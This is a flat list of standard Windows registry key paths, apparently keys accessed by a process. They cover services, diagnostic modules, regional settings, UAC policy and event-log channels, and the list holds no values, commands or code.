HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WbioSrvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WcsPlugInService\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WebClient\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wecsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wercplsupport\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinRM\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Wlansvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WPCSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wuauserv\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wudfsvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WwanSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\AppIDSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FDResPub\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Mcx2Svc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\QWAVE\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SCardSvr\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SensrSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\SSDPSRV\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\TBS\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\upnphost\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wcncsvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19\ProfileImagePath HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\W32Time\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Winmgmt\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5C85A128-86F7-41a4-B655-BEE3F2ADEF46}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{5EE64AFB-398D-4edb-AF71-3B830219ABF7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{63e0d0f7-ac2f-493b-a7f2-2f3ccdb66fca}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{67f1ec80-6c5b-43bb-860b-d47ae85242b1}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{72dbb5ac-6a91-46e6-885b-d429828bea2e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{7a54f16f-a73a-4258-ba46-a1e998a6aa74}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{85e0acd9-809a-482b-b60b-bcad1f8d0cd7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{88d4896f-f553-446a-9c75-9dec124ff8b7}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8CC29128-0B57-4a2b-A7B9-A74A70BA6FA1}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{8d39bd5b-81f8-4b94-a608-6a50bbff5d15}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{95c162b7-5b71-44f8-82e4-abfd3108f40f}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{9c5a40da-b965-4fc3-8781-88dd50a6299d}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a0d86e0d-3f06-411b-9dd5-35bc5666ff3e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{a59f0643-a6ca-48e0-a7c4-4cdd258439e2}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{abd0ea66-a840-44a9-97b1-fb74fddaa8c8}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{b171ab1c-60e9-4301-a338-beab1c70b3e9}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{bf2de437-b736-48fb-84a0-5f0c389a068e}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{C0F51D84-11B9-4e74-B083-99F11BA2DB0A}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c70949f5-bda4-4bf3-8121-af0bc174925f}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{c8544339-5be9-4f25-862e-485f1b1a6935}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{d8bcedf8-46c3-440e-bc65-dfa6a5094054}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{E4CD2E3E-3852-4952-B76B-23BB8E35D344}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\Config\ServerName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\CLResolutionInterval HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\DisplayInterval HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RADAR\SkipWatson HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\Settings\ReflectionInterval HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\CoInitializeSecurityParam HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\AuthenticationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\ImpersonationLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\AuthenticationCapabilities HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\CoInitializeSecurityAppID HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\DeferredCoInitializeSecurityServices HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\DefaultRpcStackSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\LocalServiceAndNoImpersonation\SystemCritical HKEY_CURRENT_USER\Control Panel\International\LocaleName HKEY_CURRENT_USER\Control Panel\International\sCountry HKEY_CURRENT_USER\Control Panel\International\sList HKEY_CURRENT_USER\Control Panel\International\sDecimal HKEY_CURRENT_USER\Control Panel\International\sThousand HKEY_CURRENT_USER\Control Panel\International\sGrouping HKEY_CURRENT_USER\Control Panel\International\sNativeDigits HKEY_CURRENT_USER\Control Panel\International\sCurrency HKEY_CURRENT_USER\Control Panel\International\sMonDecimalSep HKEY_CURRENT_USER\Control Panel\International\sMonThousandSep HKEY_CURRENT_USER\Control Panel\International\sMonGrouping HKEY_CURRENT_USER\Control Panel\International\sPositiveSign HKEY_CURRENT_USER\Control Panel\International\sNegativeSign HKEY_CURRENT_USER\Control Panel\International\sTimeFormat HKEY_CURRENT_USER\Control Panel\International\sShortTime HKEY_CURRENT_USER\Control Panel\International\s1159 HKEY_CURRENT_USER\Control Panel\International\s2359 HKEY_CURRENT_USER\Control Panel\International\sShortDate HKEY_CURRENT_USER\Control Panel\International\sYearMonth HKEY_CURRENT_USER\Control Panel\International\sLongDate HKEY_CURRENT_USER\Control Panel\International\iCountry HKEY_CURRENT_USER\Control Panel\International\iMeasure HKEY_CURRENT_USER\Control Panel\International\iPaperSize HKEY_CURRENT_USER\Control Panel\International\iDigits HKEY_CURRENT_USER\Control Panel\International\iLZero HKEY_CURRENT_USER\Control Panel\International\iNegNumber HKEY_CURRENT_USER\Control Panel\International\NumShape HKEY_CURRENT_USER\Control Panel\International\iCurrDigits HKEY_CURRENT_USER\Control Panel\International\iCurrency HKEY_CURRENT_USER\Control Panel\International\iNegCurr HKEY_CURRENT_USER\Control Panel\International\iCalendarType HKEY_CURRENT_USER\Control Panel\International\iFirstDayOfWeek HKEY_CURRENT_USER\Control Panel\International\iFirstWeekOfYear HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceDll HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceManifest HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceMain HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialTimeout HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialSystemCacheSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\MaximumSystemCacheSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\InitialUserCacheSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\MaximumUserCacheSize HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\AccessProviders\MartaExtension HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ServiceDllUnloadOnStop HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Reliability\TimeStampInterval HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Type HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Enabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\FileMax HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\FileCounter HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MinBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MaxBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Latency HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\ClockType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\SidType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\ControlGuid HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MaxSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\MaxSizeUpper HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Retention HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\AutoBackupLogFiles HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\File HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\FilterId HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\Isolation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\OwningPublisher HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-WindowsUpdateClient/Operational\ChannelAccess HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Type HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Enabled HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\FileMax HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\FileCounter HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\BufferSize HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MinBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\MaxBuffers HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Latency HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\ClockType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\SidType HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\Level HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-NetworkAccessProtection/WHC\ControlGuid 